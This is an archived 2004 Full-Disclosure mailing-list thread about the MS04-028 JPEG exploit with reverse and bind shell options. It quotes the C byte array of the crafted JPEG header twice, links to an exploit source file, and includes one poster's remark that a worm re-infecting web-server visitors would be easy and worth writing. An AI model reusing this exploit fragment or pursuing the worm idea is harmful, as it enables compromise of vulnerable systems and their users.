OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
RE: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...

From: Castigliola, Angelo (ACastigliolaunumprovident.com)
Date: Mon Sep 27 2004 - 15:29:58 CDT


Eh, It would not be that hard to write up something that could revisit
all of the computers that hit the web server to infect them with
something after the initial jpg exploit was ran. It would truly be a one
of a kind worm. Reason enough in itself to motivate someone to write it.

As far as Media hype. I'm all for it. It keeps the IT job market strong.

Angelo Castigliola III
Operations Technical Analyst I
UnumProvident IT Services
207.575.3820
 
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
morning_wood
Sent: Saturday, September 25, 2004 2:06 PM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and
Bind shell ...

umm, no
all this has thats different is correct headers for bind or remote shell
option. and ability to set ports and return ip in the code, instead of
needing to use your own shellcode ( or metasploits ) note: there is no
new exploit code or vector

------------------- / snip /-----------------
new.
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------
old.
------------------- / snip /-----------------
char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
------------------- / snip /-----------------

take your media hype and die kthnx,
m.wood

> the last step before the worm
>
> http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html